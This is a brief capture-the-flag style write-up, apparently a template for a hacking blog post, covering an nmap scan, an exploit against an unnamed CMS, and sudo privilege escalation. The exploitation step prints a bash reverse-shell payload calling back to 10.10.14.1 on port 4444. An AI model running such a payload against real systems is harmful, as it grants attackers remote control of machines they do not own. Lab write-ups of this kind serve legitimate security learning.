🔍 Reconnaissance

I started with an Nmap scan to identify open ports and services running on the machine.

nmap -sC -sV -oN initial_scan.txt 10.10.10.123

💥 Exploitation

A vulnerable web server running an outdated CMS was discovered. I crafted a payload using a known RCE exploit.

python exploit.py --url http://10.10.10.123 --payload 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'

🏁 Privilege Escalation

After gaining a shell as `www-data`, I checked for sudo permissions and found a misconfigured binary.

sudo /usr/bin/vuln_binary

Using `GTFObins`, I escalated to root.

Conclusion

Now you know how to write a blog. Happy hacking!